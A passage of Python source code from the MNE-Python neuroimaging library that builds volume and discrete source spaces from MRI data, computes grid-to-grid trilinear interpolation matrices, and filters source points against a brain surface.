surf = read_bem_surfaces(bem, s_id=FIFF.FIFFV_BEM_SURF_ID_BRAIN,
verbose=False)
logger.info('Loaded inner skull from %s (%d nodes)'
% (bem, surf['np']))
elif bem is not None and bem.get('is_sphere') is False:
# read bem surface in the MRI coordinate frame
which = np.where([surf['id'] == FIFF.FIFFV_BEM_SURF_ID_BRAIN
for surf in bem['surfs']])[0]
if len(which) != 1:
raise ValueError('Could not get inner skull surface from BEM')
surf = bem['surfs'][which[0]]
assert surf['id'] == FIFF.FIFFV_BEM_SURF_ID_BRAIN
if surf['coord_frame'] != FIFF.FIFFV_COORD_MRI:
raise ValueError('BEM is not in MRI coordinates, got %s'
% (_coord_frame_name(surf['coord_frame']),))
logger.info('Taking inner skull from %s' % bem)
elif surface is not None:
if isinstance(surface, str):
# read the surface in the MRI coordinate frame
surf = read_surface(surface, return_dict=True)[-1]
else:
surf = surface
logger.info('Loaded bounding surface from %s (%d nodes)'
% (surface, surf['np']))
surf = deepcopy(surf)
surf['rr'] *= 1e-3 # must be converted to meters
else: # Load an icosahedron and use that as the surface
logger.info('Setting up the sphere...')
surf = dict(R=sphere[3], r0=sphere[:3])
# Make the grid of sources in MRI space
sp = _make_volume_source_space(
surf, pos, exclude, mindist, mri, volume_label,
vol_info=vol_info, single_volume=single_volume)
del sphere
assert isinstance(sp, list)
assert len(sp) == 1 if (volume_label is None or
single_volume) else len(volume_label)
# Compute an interpolation matrix to show data in MRI_VOXEL coord frame
if mri is not None:
if add_interpolator:
_add_interpolator(sp)
elif sp[0]['type'] == 'vol':
# If there is no interpolator, it's actually a discrete source space
sp[0]['type'] = 'discrete'
# do some cleaning
if volume_label is None and 'seg_name' in sp[0]:
del sp[0]['seg_name']
for s in sp:
if 'vol_dims' in s:
del s['vol_dims']
# Save it
sp = _complete_vol_src(sp, subject)
return sp
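# Illustrative sketch (hypothetical subject, subjects_dir, and BEM file): a
# whole-brain volume source space on a 5 mm grid bounded by the inner skull.
def _example_setup_volume_source_space():
    src = setup_volume_source_space(
        'sample', pos=5.0, mri='T1.mgz',
        bem='/path/to/sample-5120-bem.fif',
        subjects_dir='/path/to/subjects')
    return src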
def _complete_vol_src(sp, subject=None):
for s in sp:
s.update(dict(nearest=None, dist=None, use_tris=None, patch_inds=None,
dist_limit=None, pinfo=None, ntri=0, nearest_dist=None,
nuse_tri=0, tris=None, subject_his_id=subject))
sp = SourceSpaces(sp, dict(working_dir=os.getcwd(), command_line='None'))
return sp
def _make_voxel_ras_trans(move, ras, voxel_size):
"""Make a transformation from MRI_VOXEL to MRI surface RAS (i.e. MRI)."""
assert voxel_size.ndim == 1
assert voxel_size.size == 3
rot = ras.T * voxel_size[np.newaxis, :]
assert rot.ndim == 2
assert rot.shape[0] == 3
assert rot.shape[1] == 3
trans = np.c_[np.r_[rot, np.zeros((1, 3))], np.r_[move, 1.0]]
t = Transform('mri_voxel', 'mri', trans)
return t
def _make_discrete_source_space(pos, coord_frame='mri'):
"""Use a discrete set of source locs/oris to make src space.
Parameters
----------
pos : dict
Must have entries "rr" and "nn". Data should be in meters.
coord_frame : str
The coordinate frame in which the positions are given; default: 'mri'.
The frame must be one defined in transforms.py:_str_to_frame
Returns
-------
src : dict
The source space.
"""
# Check that coordinate frame is valid
if coord_frame not in _str_to_frame: # will fail if coord_frame not string
raise KeyError('coord_frame must be one of %s, not "%s"'
% (list(_str_to_frame.keys()), coord_frame))
coord_frame = _str_to_frame[coord_frame] # now an int
# process points (copy and cast)
rr = np.array(pos['rr'], float)
nn = np.array(pos['nn'], float)
    if not (rr.ndim == nn.ndim == 2 and rr.shape[0] == nn.shape[0] and
            rr.shape[1] == nn.shape[1]):
raise RuntimeError('"rr" and "nn" must both be 2D arrays with '
'the same number of rows and 3 columns')
npts = rr.shape[0]
_normalize_vectors(nn)
nz = np.sum(np.sum(nn * nn, axis=1) == 0)
if nz != 0:
raise RuntimeError('%d sources have zero length normal' % nz)
logger.info('Positions (in meters) and orientations')
logger.info('%d sources' % npts)
# Ready to make the source space
sp = dict(coord_frame=coord_frame, type='discrete', nuse=npts, np=npts,
inuse=np.ones(npts, int), vertno=np.arange(npts), rr=rr, nn=nn,
id=-1)
return sp
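# Minimal sketch of the ``pos`` dict format consumed above: positions and unit
# normals, both in meters. Synthetic values only.
def _example_discrete_pos():
    pos = dict(rr=np.array([[0.0, 0.0, 0.07], [0.01, 0.0, 0.07]]),
               nn=np.array([[0.0, 0.0, 1.0], [0.0, 0.0, 1.0]]))
    sp = _make_discrete_source_space(pos)
    assert sp['nuse'] == 2
    return sp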
def _import_nibabel(why='use MRI files'):
try:
import nibabel as nib
except ImportError as exp:
msg = 'nibabel is required to %s, got:\n%s' % (why, exp)
else:
msg = ''
if msg:
raise ImportError(msg)
return nib
def _mri_orientation(img, orientation):
"""Get MRI orientation information from an image.
Parameters
----------
img : instance of SpatialImage
The MRI image.
orientation : str
        Orientation that you want. Can be "axial", "sagittal", or "coronal".
Returns
-------
xyz : tuple, shape (3,)
The dimension indices for X, Y, and Z.
flips : tuple, shape (3,)
Whether each dimension requires a flip.
order : tuple, shape (3,)
The resulting order of the data if the given ``xyz`` and ``flips``
are used.
Notes
-----
.. versionadded:: 0.21
"""
import nibabel as nib
_validate_type(img, nib.spatialimages.SpatialImage)
_check_option('orientation', orientation, ('coronal', 'axial', 'sagittal'))
axcodes = ''.join(nib.orientations.aff2axcodes(img.affine))
flips = {o: (1 if o in axcodes else -1) for o in 'RAS'}
axcodes = axcodes.replace('L', 'R').replace('P', 'A').replace('I', 'S')
order = dict(
coronal=('R', 'S', 'A'),
axial=('R', 'A', 'S'),
sagittal=('A', 'S', 'R'),
)[orientation]
xyz = tuple(axcodes.index(c) for c in order)
flips = tuple(flips[c] for c in order)
return xyz, flips, order
def _get_mri_info_data(mri, data):
# Read the segmentation data using nibabel
if data:
_import_nibabel('load MRI atlas data')
out = dict()
_, out['vox_mri_t'], out['mri_ras_t'], dims, _, mgz = _read_mri_info(
mri, return_img=True)
out.update(
mri_width=dims[0], mri_height=dims[1],
        mri_depth=dims[2], mri_volume_name=mri)
if data:
assert mgz is not None
out['mri_vox_t'] = invert_transform(out['vox_mri_t'])
out['data'] = np.asarray(mgz.dataobj)
return out
def _get_atlas_values(vol_info, rr):
# Transform MRI coordinates (where our surfaces live) to voxels
rr_vox = apply_trans(vol_info['mri_vox_t'], rr)
good = ((rr_vox >= -.5) &
(rr_vox < np.array(vol_info['data'].shape, int) - 0.5)).all(-1)
idx = np.round(rr_vox[good].T).astype(np.int64)
values = np.full(rr.shape[0], np.nan)
values[good] = vol_info['data'][tuple(idx)]
return values
def _make_volume_source_space(surf, grid, exclude, mindist, mri=None,
volume_labels=None, do_neighbors=True, n_jobs=1,
vol_info={}, single_volume=False):
"""Make a source space which covers the volume bounded by surf."""
# Figure out the grid size in the MRI coordinate frame
if 'rr' in surf:
mins = np.min(surf['rr'], axis=0)
maxs = np.max(surf['rr'], axis=0)
cm = np.mean(surf['rr'], axis=0) # center of mass
maxdist = np.linalg.norm(surf['rr'] - cm, axis=1).max()
else:
mins = surf['r0'] - surf['R']
maxs = surf['r0'] + surf['R']
cm = surf['r0'].copy()
maxdist = surf['R']
# Define the sphere which fits the surface
logger.info('Surface CM = (%6.1f %6.1f %6.1f) mm'
% (1000 * cm[0], 1000 * cm[1], 1000 * cm[2]))
logger.info('Surface fits inside a sphere with radius %6.1f mm'
% (1000 * maxdist))
logger.info('Surface extent:')
for c, mi, ma in zip('xyz', mins, maxs):
logger.info(' %s = %6.1f ... %6.1f mm'
% (c, 1000 * mi, 1000 * ma))
maxn = np.array([np.floor(np.abs(m) / grid) + 1 if m > 0 else -
np.floor(np.abs(m) / grid) - 1 for m in maxs], int)
minn = np.array([np.floor(np.abs(m) / grid) + 1 if m > 0 else -
np.floor(np.abs(m) / grid) - 1 for m in mins], int)
logger.info('Grid extent:')
for c, mi, ma in zip('xyz', minn, maxn):
logger.info(' %s = %6.1f ... %6.1f mm'
% (c, 1000 * mi * grid, 1000 * ma * grid))
# Now make the initial grid
ns = tuple(maxn - minn + 1)
npts = np.prod(ns)
nrow = ns[0]
ncol = ns[1]
nplane = nrow * ncol
# x varies fastest, then y, then z (can use unravel to do this)
rr = np.meshgrid(np.arange(minn[2], maxn[2] + 1),
np.arange(minn[1], maxn[1] + 1),
np.arange(minn[0], maxn[0] + 1), indexing='ij')
x, y, z = rr[2].ravel(), rr[1].ravel(), rr[0].ravel()
rr = np.array([x * grid, y * grid, z * grid]).T
sp = dict(np=npts, nn=np.zeros((npts, 3)), rr=rr,
inuse=np.ones(npts, bool), type='vol', nuse=npts,
coord_frame=FIFF.FIFFV_COORD_MRI, id=-1, shape=ns)
sp['nn'][:, 2] = 1.0
assert sp['rr'].shape[0] == npts
logger.info('%d sources before omitting any.', sp['nuse'])
# Exclude infeasible points
dists = np.linalg.norm(sp['rr'] - cm, axis=1)
bads = np.where(np.logical_or(dists < exclude, dists > maxdist))[0]
sp['inuse'][bads] = False
sp['nuse'] -= len(bads)
logger.info('%d sources after omitting infeasible sources not within '
'%0.1f - %0.1f mm.',
sp['nuse'], 1000 * exclude, 1000 * maxdist)
if 'rr' in surf:
_filter_source_spaces(surf, mindist, None, [sp], n_jobs)
else: # sphere
vertno = np.where(sp['inuse'])[0]
bads = (np.linalg.norm(sp['rr'][vertno] - surf['r0'], axis=-1) >=
surf['R'] - mindist / 1000.)
sp['nuse'] -= bads.sum()
sp['inuse'][vertno[bads]] = False
sp['vertno'] = np.where(sp['inuse'])[0]
del vertno
del surf
logger.info('%d sources remaining after excluding the sources outside '
'the surface and less than %6.1f mm inside.'
% (sp['nuse'], mindist))
# Restrict sources to volume of interest
if volume_labels is None:
sp['seg_name'] = 'the whole brain'
sps = [sp]
else:
if not do_neighbors:
raise RuntimeError('volume_label cannot be None unless '
'do_neighbors is True')
sps = list()
orig_sp = sp
# reduce the sizes when we deepcopy
for volume_label, id_ in volume_labels.items():
# this saves us some memory
memodict = dict()
for key in ('rr', 'nn'):
if key in orig_sp:
arr = orig_sp[key]
memodict[id(arr)] = arr
sp = deepcopy(orig_sp, memodict)
good = _get_atlas_values(vol_info, sp['rr'][sp['vertno']]) == id_
n_good = good.sum()
logger.info(' Selected %d voxel%s from %s'
% (n_good, _pl(n_good), volume_label))
# Update source info
sp['inuse'][sp['vertno'][~good]] = False
sp['vertno'] = sp['vertno'][good]
sp['nuse'] = sp['inuse'].sum()
sp['seg_name'] = volume_label
sp['mri_file'] = mri
sps.append(sp)
del orig_sp
assert len(sps) == len(volume_labels)
# This will undo some of the work above, but the calculations are
# pretty trivial so allow it
if single_volume:
for sp in sps[1:]:
sps[0]['inuse'][sp['vertno']] = True
sp = sps[0]
sp['seg_name'] = '+'.join(s['seg_name'] for s in sps)
sps = sps[:1]
sp['vertno'] = np.where(sp['inuse'])[0]
sp['nuse'] = len(sp['vertno'])
del sp, volume_labels
if not do_neighbors:
return sps
k = np.arange(npts)
neigh = np.empty((26, npts), int)
neigh.fill(-1)
# Figure out each neighborhood:
# 6-neighborhood first
idxs = [z > minn[2], x < maxn[0], y < maxn[1],
x > minn[0], y > minn[1], z < maxn[2]]
offsets = [-nplane, 1, nrow, -1, -nrow, nplane]
for n, idx, offset in zip(neigh[:6], idxs, offsets):
n[idx] = k[idx] + offset
# Then the rest to complete the 26-neighborhood
# First the plane below
idx1 = z > minn[2]
idx2 = np.logical_and(idx1, x < maxn[0])
neigh[6, idx2] = k[idx2] + 1 - nplane
idx3 = np.logical_and(idx2, y < maxn[1])
neigh[7, idx3] = k[idx3] + 1 + nrow - nplane
idx2 = np.logical_and(idx1, y < maxn[1])
neigh[8, idx2] = k[idx2] + nrow - nplane
idx2 = np.logical_and(idx1, x > minn[0])
idx3 = np.logical_and(idx2, y < maxn[1])
neigh[9, idx3] = k[idx3] - 1 + nrow - nplane
neigh[10, idx2] = k[idx2] - 1 - nplane
idx3 = np.logical_and(idx2, y > minn[1])
neigh[11, idx3] = k[idx3] - 1 - nrow - nplane
idx2 = np.logical_and(idx1, y > minn[1])
neigh[12, idx2] = k[idx2] - nrow - nplane
idx3 = np.logical_and(idx2, x < maxn[0])
neigh[13, idx3] = k[idx3] + 1 - nrow - nplane
# Then the same plane
idx1 = np.logical_and(x < maxn[0], y < maxn[1])
neigh[14, idx1] = k[idx1] + 1 + nrow
idx1 = x > minn[0]
idx2 = np.logical_and(idx1, y < maxn[1])
neigh[15, idx2] = k[idx2] - 1 + nrow
idx2 = np.logical_and(idx1, y > minn[1])
neigh[16, idx2] = k[idx2] - 1 - nrow
idx1 = np.logical_and(y > minn[1], x < maxn[0])
    neigh[17, idx1] = k[idx1] + 1 - nrow
# Finally one plane above
idx1 = z < maxn[2]
idx2 = np.logical_and(idx1, x < maxn[0])
neigh[18, idx2] = k[idx2] + 1 + nplane
idx3 = np.logical_and(idx2, y < maxn[1])
neigh[19, idx3] = k[idx3] + 1 + nrow + nplane
idx2 = np.logical_and(idx1, y < maxn[1])
neigh[20, idx2] = k[idx2] + nrow + nplane
idx2 = np.logical_and(idx1, x > minn[0])
idx3 = np.logical_and(idx2, y < maxn[1])
neigh[21, idx3] = k[idx3] - 1 + nrow + nplane
neigh[22, idx2] = k[idx2] - 1 + nplane
idx3 = np.logical_and(idx2, y > minn[1])
neigh[23, idx3] = k[idx3] - 1 - nrow + nplane
idx2 = np.logical_and(idx1, y > minn[1])
neigh[24, idx2] = k[idx2] - nrow + nplane
idx3 = np.logical_and(idx2, x < maxn[0])
neigh[25, idx3] = k[idx3] + 1 - nrow + nplane
# Omit unused vertices from the neighborhoods
logger.info('Adjusting the neighborhood info.')
r0 = minn * grid
voxel_size = grid * np.ones(3)
ras = np.eye(3)
src_mri_t = _make_voxel_ras_trans(r0, ras, voxel_size)
neigh_orig = neigh
for sp in sps:
# remove non source-space points
neigh = neigh_orig.copy()
neigh[:, np.logical_not(sp['inuse'])] = -1
# remove these points from neigh
old_shape = neigh.shape
neigh = neigh.ravel()
checks = np.where(neigh >= 0)[0]
removes = np.logical_not(np.in1d(checks, sp['vertno']))
neigh[checks[removes]] = -1
neigh.shape = old_shape
neigh = neigh.T
# Thought we would need this, but C code keeps -1 vertices, so we will:
# neigh = [n[n >= 0] for n in enumerate(neigh[vertno])]
sp['neighbor_vert'] = neigh
# Set up the volume data (needed for creating the interpolation matrix)
sp['src_mri_t'] = src_mri_t
sp['vol_dims'] = maxn - minn + 1
for key in ('mri_width', 'mri_height', 'mri_depth', 'mri_volume_name',
'vox_mri_t', 'mri_ras_t'):
if key in vol_info:
sp[key] = vol_info[key]
_print_coord_trans(sps[0]['src_mri_t'], 'Source space : ')
for key in ('vox_mri_t', 'mri_ras_t'):
if key in sps[0]:
_print_coord_trans(sps[0][key], 'MRI volume : ')
return sps
def _vol_vertex(width, height, jj, kk, pp):
return jj + width * kk + pp * (width * height)
def _get_mgz_header(fname):
"""Adapted from nibabel to quickly extract header info."""
fname = _check_fname(fname, overwrite='read', must_exist=True,
name='MRI image')
if not fname.endswith('.mgz'):
raise IOError('Filename must end with .mgz')
header_dtd = [('version', '>i4'), ('dims', '>i4', (4,)),
('type', '>i4'), ('dof', '>i4'), ('goodRASFlag', '>i2'),
('delta', '>f4', (3,)), ('Mdc', '>f4', (3, 3)),
('Pxyz_c', '>f4', (3,))]
header_dtype = np.dtype(header_dtd)
with GzipFile(fname, 'rb') as fid:
hdr_str = fid.read(header_dtype.itemsize)
header = np.ndarray(shape=(), dtype=header_dtype,
buffer=hdr_str)
# dims
dims = header['dims'].astype(int)
dims = dims[:3] if len(dims) == 4 else dims
# vox2ras_tkr
delta = header['delta']
ds = np.array(delta, float)
ns = np.array(dims * ds) / 2.0
v2rtkr = np.array([[-ds[0], 0, 0, ns[0]],
[0, 0, ds[2], -ns[2]],
[0, -ds[1], 0, ns[1]],
[0, 0, 0, 1]], dtype=np.float32)
# ras2vox
d = np.diag(delta)
pcrs_c = dims / 2.0
Mdc = header['Mdc'].T
pxyz_0 = header['Pxyz_c'] - np.dot(Mdc, np.dot(d, pcrs_c))
M = np.eye(4, 4)
M[0:3, 0:3] = np.dot(Mdc, d)
M[0:3, 3] = pxyz_0.T
header = dict(dims=dims, vox2ras_tkr=v2rtkr, vox2ras=M,
zooms=header['delta'])
return header
def _src_vol_dims(s):
w, h, d = [s[f'mri_{key}'] for key in ('width', 'height', 'depth')]
return w, h, d, np.prod([w, h, d])
def _add_interpolator(sp):
"""Compute a sparse matrix to interpolate the data into an MRI volume."""
# extract transformation information from mri
from scipy import sparse
mri_width, mri_height, mri_depth, nvox = _src_vol_dims(sp[0])
#
# Convert MRI voxels from destination (MRI volume) to source (volume
# source space subset) coordinates
#
combo_trans = combine_transforms(sp[0]['vox_mri_t'],
invert_transform(sp[0]['src_mri_t']),
'mri_voxel', 'mri_voxel')
logger.info('Setting up volume interpolation ...')
inuse = np.zeros(sp[0]['np'], bool)
for s_ in sp:
np.logical_or(inuse, s_['inuse'], out=inuse)
interp = _grid_interp(
sp[0]['vol_dims'], (mri_width, mri_height, mri_depth),
combo_trans['trans'], order=1, inuse=inuse)
assert isinstance(interp, sparse.csr_matrix)
# Compose the sparse matrices
for si, s in enumerate(sp):
if len(sp) == 1: # no need to do these gymnastics
this_interp = interp
        else:  # limit to rows that have any contribution from inuse
# This is the same as the following, but more efficient:
# any_ = np.asarray(
# interp[:, s['inuse'].astype(bool)].sum(1)
# )[:, 0].astype(bool)
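            # Note (not from the original source): the cumulative sum of
            # s['inuse'] over the CSR column indices, sampled at the row
            # boundaries (indptr) and differenced, counts how many in-use
            # columns each row touches; rows that touch none are dropped by
            # zeroing their row lengths before rebuilding indptr below.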
any_ = np.zeros(interp.indices.size + 1, np.int64)
any_[1:] = s['inuse'][interp.indices]
np.cumsum(any_, out=any_)
any_ = np.diff(any_[interp.indptr]) > 0
assert any_.shape == (interp.shape[0],)
indptr = np.empty_like(interp.indptr)
indptr[0] = 0
indptr[1:] = np.diff(interp.indptr)
indptr[1:][~any_] = 0
np.cumsum(indptr, out=indptr)
mask = np.repeat(any_, np.diff(interp.indptr))
indices = interp.indices[mask]
data = interp.data[mask]
assert data.shape == indices.shape == (indptr[-1],)
this_interp = sparse.csr_matrix(
(data, indices, indptr), shape=interp.shape)
s['interpolator'] = this_interp
logger.info(' %d/%d nonzero values for %s'
% (len(s['interpolator'].data), nvox, s['seg_name']))
logger.info('[done]')
def _grid_interp(from_shape, to_shape, trans, order=1, inuse=None):
"""Compute a grid-to-grid linear or nearest interpolation given."""
from scipy import sparse
from_shape = np.array(from_shape, int)
to_shape = np.array(to_shape, int)
trans = np.array(trans, np.float64) # to -> from
assert trans.shape == (4, 4) and np.array_equal(trans[3], [0, 0, 0, 1])
assert from_shape.shape == to_shape.shape == (3,)
shape = (np.prod(to_shape), np.prod(from_shape))
if inuse is None:
inuse = np.ones(shape[1], bool)
assert inuse.dtype == bool
assert inuse.shape == (shape[1],)
data, indices, indptr = _grid_interp_jit(
from_shape, to_shape, trans, order, inuse)
data = np.concatenate(data)
indices = np.concatenate(indices)
indptr = np.cumsum(indptr)
interp = sparse.csr_matrix((data, indices, indptr), shape=shape)
return interp
# This is all set up to do jit, but it's actually slower!
def _grid_interp_jit(from_shape, to_shape, trans, order, inuse):
# Loop over slices to save (lots of) memory
# Note that it is the slowest incrementing index
# This is equivalent to using mgrid and reshaping, but faster
assert order in (0, 1)
data = list()
indices = list()
nvox = np.prod(to_shape)
indptr = np.zeros(nvox + 1, np.int32)
mri_width, mri_height, mri_depth = to_shape
r0__ = np.empty((4, mri_height, mri_width), np.float64)
r0__[0, :, :] = np.arange(mri_width)
r0__[1, :, :] = np.arange(mri_height).reshape(1, mri_height, 1)
r0__[3, :, :] = 1
r0_ = np.reshape(r0__, (4, mri_width * mri_height))
width, height, _ = from_shape
trans = np.ascontiguousarray(trans)
maxs = (from_shape - 1).reshape(1, 3)
for p in range(mri_depth):
r0_[2] = p
# Transform our vertices from their MRI space into our source space's
# frame (this is labeled as FIFFV_MNE_COORD_MRI_VOXEL, but it's
# really a subset of the entire volume!)
r0 = (trans @ r0_)[:3].T
if order == 0:
rx = np.round(r0).astype(np.int32)
keep = np.where(np.logical_and(np.all(rx >= 0, axis=1),
np.all(rx <= maxs, axis=1)))[0]
indptr[keep + p * mri_height * mri_width + 1] = 1
indices.append(_vol_vertex(width, height, *rx[keep].T))
data.append(np.ones(len(keep)))
continue
rn = np.floor(r0).astype(np.int32)
good = np.where(np.logical_and(np.all(rn >= -1, axis=1),
np.all(rn <= maxs, axis=1)))[0]
if len(good) == 0:
continue
rns = rn[good]
r0s = r0[good]
jj_g, kk_g, pp_g = (rns >= 0).T
jjp1_g, kkp1_g, ppp1_g = (rns < maxs).T # same as rns + 1 <= maxs
# now we take each MRI voxel *in this space*, and figure out how
# to make its value the weighted sum of voxels in the volume source
# space. This is a trilinear interpolation based on the
# fact that we know we're interpolating from one volumetric grid
# into another.
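        # Worked note (not from the original source): for a target point with
        # fractional offsets (xf, yf, zf) inside its enclosing source-grid
        # cell, each of the eight corner weights computed below is a product
        # of (1 - f) or f per axis, e.g. the corner at (jj, kk, pp) gets
        # (1 - xf) * (1 - yf) * (1 - zf) and the opposite corner at
        # (jj + 1, kk + 1, pp + 1) gets xf * yf * zf; the weights sum to 1.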
jj = rns[:, 0]
kk = rns[:, 1]
pp = rns[:, 2]
vss = np.empty((len(jj), 8), np.int32)
jjp1 = jj + 1
kkp1 = kk + 1
ppp1 = pp + 1
mask = np.empty((len(jj), 8), bool)
vss[:, 0] = _vol_vertex(width, height, jj, kk, pp)
mask[:, 0] = jj_g & kk_g & pp_g
vss[:, 1] = _vol_vertex(width, height, jjp1, kk, pp)
mask[:, 1] = jjp1_g & kk_g & pp_g
vss[:, 2] = _vol_vertex(width, height, jjp1, kkp1, pp)
mask[:, 2] = jjp1_g & kkp1_g & pp_g
vss[:, 3] = _vol_vertex(width, height, jj, kkp1, pp)
mask[:, 3] = jj_g & kkp1_g & pp_g
vss[:, 4] = _vol_vertex(width, height, jj, kk, ppp1)
mask[:, 4] = jj_g & kk_g & ppp1_g
vss[:, 5] = _vol_vertex(width, height, jjp1, kk, ppp1)
mask[:, 5] = jjp1_g & kk_g & ppp1_g
vss[:, 6] = _vol_vertex(width, height, jjp1, kkp1, ppp1)
mask[:, 6] = jjp1_g & kkp1_g & ppp1_g
vss[:, 7] = _vol_vertex(width, height, jj, kkp1, ppp1)
mask[:, 7] = jj_g & kkp1_g & ppp1_g
# figure out weights for each vertex
xf = r0s[:, 0] - rns[:, 0].astype(np.float64)
yf = r0s[:, 1] - rns[:, 1].astype(np.float64)
zf = r0s[:, 2] - rns[:, 2].astype(np.float64)
omxf = 1.0 - xf
omyf = 1.0 - yf
omzf = 1.0 - zf
this_w = np.empty((len(good), 8), np.float64)
this_w[:, 0] = omxf * omyf * omzf
this_w[:, 1] = xf * omyf * omzf
this_w[:, 2] = xf * yf * omzf
this_w[:, 3] = omxf * yf * omzf
this_w[:, 4] = omxf * omyf * zf
this_w[:, 5] = xf * omyf * zf
this_w[:, 6] = xf * yf * zf
this_w[:, 7] = omxf * yf * zf
# eliminate zeros
mask[this_w <= 0] = False
# eliminate rows where none of inuse are actually present
row_mask = mask.copy()
row_mask[mask] = inuse[vss[mask]]
mask[~(row_mask.any(axis=-1))] = False
# construct the parts we need
indices.append(vss[mask])
indptr[good + p * mri_height * mri_width + 1] = mask.sum(1)
data.append(this_w[mask])
return data, indices, indptr
def _pts_in_hull(pts, hull, tolerance=1e-12):
return np.all([np.dot(eq[:-1], pts.T) + eq[-1] <= tolerance
for eq in hull.equations], axis=0)
@verbose
def _filter_source_spaces(surf, limit, mri_head_t, src, n_jobs=1,
verbose=None):
"""Remove all source space points closer than a given limit (in mm)."""
if src[0]['coord_frame'] == FIFF.FIFFV_COORD_HEAD and mri_head_t is None:
raise RuntimeError('Source spaces are in head coordinates and no '
'coordinate transform was provided!')
# How close are the source points to the surface?
out_str = 'Source spaces are in '
if src[0]['coord_frame'] == FIFF.FIFFV_COORD_HEAD:
inv_trans = invert_transform(mri_head_t)
out_str += 'head coordinates.'
elif src[0]['coord_frame'] == FIFF.FIFFV_COORD_MRI:
out_str += 'MRI coordinates.'
else:
out_str += 'unknown (%d) coordinates.' % src[0]['coord_frame']
logger.info(out_str)
out_str = 'Checking that the sources are inside the surface'
if limit > 0.0:
out_str += ' and at least %6.1f mm away' % (limit)
logger.info(out_str + ' (will take a few...)')
# fit a sphere to a surf quickly
check_inside = _CheckInside(surf)
# Check that the source is inside surface (often the inner skull)
for s in src:
vertno = np.where(s['inuse'])[0] # can't trust s['vertno'] this deep
# Convert all points here first to save time
r1s = s['rr'][vertno]
if s['coord_frame'] == FIFF.FIFFV_COORD_HEAD:
r1s = apply_trans(inv_trans['trans'], r1s)
inside = check_inside(r1s, n_jobs)
omit_outside = (~inside).sum()
# vectorized nearest using BallTree (or cdist)
omit_limit = 0
if limit > 0.0:
# only check "inside" points
idx = np.where(inside)[0]
check_r1s = r1s[idx]
if check_inside.inner_r is not None:
# ... and those that are at least inner_sphere + limit away
mask = (np.linalg.norm(check_r1s - check_inside.cm, axis=-1) >=
check_inside.inner_r - limit / 1000.)
idx = idx[mask]
check_r1s = check_r1s[mask]
dists = _compute_nearest(
surf['rr'], check_r1s, return_dists=True, method='cKDTree')[1]
close = (dists < limit / 1000.0)
omit_limit = np.sum(close)
inside[idx[close]] = False
s['inuse'][vertno[~inside]] = False
del vertno
s['nuse'] -= (omit_outside + omit_limit)
s['vertno'] = np.where(s['inuse'])[0]
if omit_outside > 0:
extras = [omit_outside]
extras += ['s', 'they are'] if omit_outside > 1 else ['', 'it is']
logger.info(' %d source space point%s omitted because %s '
'outside the inner skull surface.' % tuple(extras))
if omit_limit > 0:
extras = [omit_limit]
            extras += ['s'] if omit_limit > 1 else ['']
extras += [limit]
logger.info(' %d source space point%s omitted because of the '
'%6.1f-mm distance limit.' % tuple(extras))
# Adjust the patch inds as well if necessary
if omit_limit + omit_outside > 0:
_adjust_patch_info(s)
@verbose
def _adjust_patch_info(s, verbose=None):
"""Adjust patch information in place after vertex omission."""
if s.get('patch_inds') is not None:
if s['nearest'] is None:
# This shouldn't happen, but if it does, we can probably come
# up with a more clever solution
raise RuntimeError('Cannot adjust patch information properly, '
'please contact the mne-python developers')
_add_patch_info(s)
@verbose
def _ensure_src(src, kind=None, extra='', verbose=None):
"""Ensure we have a source space."""
_check_option(
'kind', kind, (None, 'surface', 'volume', 'mixed', 'discrete'))
msg = 'src must be a string or instance of SourceSpaces%s' % (extra,)
if _check_path_like(src):
src = str(src)
if not op.isfile(src):
raise IOError('Source space file "%s" not found' % src)
logger.info('Reading %s...' % src)
src = read_source_spaces(src, verbose=False)
if not isinstance(src, SourceSpaces):
raise ValueError('%s, got %s (type %s)' % (msg, src, type(src)))
if kind is not None:
if src.kind != kind and src.kind == 'mixed':
if kind == 'surface':
src = src[:2]
elif kind == 'volume':
src = src[2:]
if src.kind != kind:
raise ValueError('Source space must contain %s type, got '
'%s' % (kind, src.kind))
return src
def _ensure_src_subject(src, subject):
src_subject = src._subject
if subject is None:
subject = src_subject
if subject is None:
raise ValueError('source space is too old, subject must be '
'provided')
elif src_subject is not None and subject != src_subject:
raise ValueError('Mismatch between provided subject "%s" and subject '
'name "%s" in the source space'
% (subject, src_subject))
return subject
_DIST_WARN_LIMIT = 10242 # warn for anything larger than ICO-5
@verbose
def add_source_space_distances(src, dist_limit=np.inf, n_jobs=1, verbose=None):
"""Compute inter-source distances along the cortical surface.
This function will also try to add patch info for the source space.
    Patch information will only be added if ``dist_limit`` is sufficiently
    high that all points on the surface are within ``dist_limit`` of a point
    in the source space.
Parameters
----------
src : instance of SourceSpaces
The source spaces to compute distances for.
dist_limit : float
The upper limit of distances to include (in meters).
Note: if limit < np.inf, scipy > 0.13 (bleeding edge as of
10/2013) must be installed. If 0, then only patch (nearest vertex)
information is added.
%(n_jobs)s
Ignored if ``dist_limit==0.``.
%(verbose)s
Returns
-------
src : instance of SourceSpaces
The original source spaces, with distance information added.
The distances are stored in src[n]['dist'].
Note: this function operates in-place.
Notes
-----
This function can be memory- and CPU-intensive. On a high-end machine
(2012) running 6 jobs in parallel, an ico-5 (10242 per hemi) source space
takes about 10 minutes to compute all distances (``dist_limit = np.inf``).
With ``dist_limit = 0.007``, computing distances takes about 1 minute.
We recommend computing distances once per source space and then saving
the source space to disk, as the computed distances will automatically be
stored along with the source space data for future use.
"""
from scipy.sparse import csr_matrix
from scipy.sparse.csgraph import dijkstra
n_jobs = check_n_jobs(n_jobs)
src = _ensure_src(src)
dist_limit = float(dist_limit)
if dist_limit < 0:
raise ValueError('dist_limit must be non-negative, got %s'
% (dist_limit,))
patch_only = (dist_limit == 0)
if patch_only and not check_version('scipy', '1.3'):
raise RuntimeError('scipy >= 1.3 is required to calculate patch '
'information only, consider upgrading SciPy or '
'using dist_limit=np.inf when running '
'add_source_space_distances')
if src.kind != 'surface':
raise RuntimeError('Currently all source spaces must be of surface '
'type')
parallel, p_fun, _ = parallel_func(_do_src_distances, n_jobs)
min_dists = list()
min_idxs = list()
msg = 'patch information' if patch_only else 'source space distances'
logger.info('Calculating %s (limit=%s mm)...' % (msg, 1000 * dist_limit))
max_n = max(s['nuse'] for s in src)
if not patch_only and max_n > _DIST_WARN_LIMIT:
warn('Computing distances for %d source space points (in one '
'hemisphere) will be very slow, consider using add_dist=False'
% (max_n,))
for s in src:
adjacency = mesh_dist(s['tris'], s['rr'])
if patch_only:
min_dist, _, min_idx = dijkstra(
adjacency, indices=s['vertno'],
min_only=True, return_predecessors=True)
min_dists.append(min_dist.astype(np.float32))
min_idxs.append(min_idx)
for key in ('dist', 'dist_limit'):
